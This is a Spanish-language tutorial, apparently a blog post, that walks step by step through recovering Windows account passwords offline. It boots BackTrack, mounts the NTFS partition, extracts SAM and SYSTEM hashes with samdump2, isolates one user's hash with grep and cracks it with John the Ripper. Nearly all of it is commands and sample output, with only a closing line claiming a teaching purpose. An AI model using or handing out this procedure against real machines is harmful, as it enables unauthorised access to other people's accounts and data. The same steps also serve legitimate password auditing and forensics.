En Windows NT/2000/XP/2003/VISTA/7 las contraseñas se almacenan en el archivo SAM(Security Account Manager). Este es el fichero que contiene los nombres de usuario y las contraseñas de todos los usuarios del sistema local, o incluso del dominio, si se trata de un controlador de dominio.
El archivo SAM y SYSTEM se encuentra en la ruta \Windows\System32\config
Abrimos una Terminal o consola
PASO 1 : Ahora listaremos las tablas de particiones con el siguiente comando:
root@bt: ~# fdisk -l
Observaremos algo asi
Device Boot Start End Blocks id System
/dev/sda1 13 7784 62417920 7 HPFS/NTFS
* /dev/sda2 26 23456 156623556 23 HPFS/NTFS
/dev/sda3 24 35217 44387444 45 LINUX
PASO 2 : Comando utilizado para crear un punto de montaje es:
root@bt: ~# mkdir /mnt/windows7
PASO 3 : Montaje de su partición NTFS con el comando:
root@bt: ~# mount -t ntfs /dev/sda2 /mnt/windows7
PASO 4 : Accedemos al directorio que creamos y montamos la partición de windows.
root@bt: ~# cd /mnt/windows7
Con el comando ls muestra el contenido de un directorio.
root@bt: /mnt/windows7# ls
Observamos que esta partición sea la correcta donde esta instalado windows
Observe dos directorios User (ocupe el comando cd /Users y despues ls para ver todos los usuarios), Windows siga con el siguiente paso.
En caso de no observar estos directorios regrese al PASO 3 indicando la particion donde esta instalado windows
PASO 5 : Ahora accedemos al directorio donde se encuentra el SAM SYSTEM de Windows que es donde se almacenan los Hashes de contraseñas de los usuarios, ubicada en /Windows/System32/config:
root@bt: /mnt/windows7# cd /Windows/System32/config
PASO 6 : Utilice la herramienta “Samdump” para mover los hashes del archivo SAM en el archivo “pass1″.
root@bt: /mnt/windows7/Windows/System32/config# samdump2 system sam > /root/pass1
PASO 7 : A través del “grep” búsqueda de comandos del Administrador de hash en el archivo y guardarlo en otro archivo “PASS2″.
root@bt: /mnt/windows7/Windows/System32/config# cat /root/pass1 | grep NOMBRE_USUARIO > /root/pass2
NOMBRE_USUARIO = Es el usuario del que queremos obtener su contraseña recuerde PASO 4
PASO 8 : Use John The Ripper (jtr) en BT4 y (john) en BT5 para encontrar las contraseñas.
root@bt: /mnt/windows7/Windows/System32/config# cd /pentest/passwords/jtr
PASO 9 : Escriba ./John para ver el formato y las distintas opciones.
root@bt: /pentest/passwords/jtr# ./John
PASO 10 : usar el hash NTLM así que usamos el siguiente comando para descifrarlo.
root@bt: /pentest/passwords/jtr# ./john –format=NT /root/pass2
ó
root@bt: /pentest/passwords/jtr# ./john –format:NT /root/pass2
loades 1 password hash (NT MD5 [128/128 SSE2 + 32/32])
contraseña NOMBRE_USUARIO
Esta información está diseñada con fines didácticos y no nos hacemos responsables del mal uso que se le pueda dar.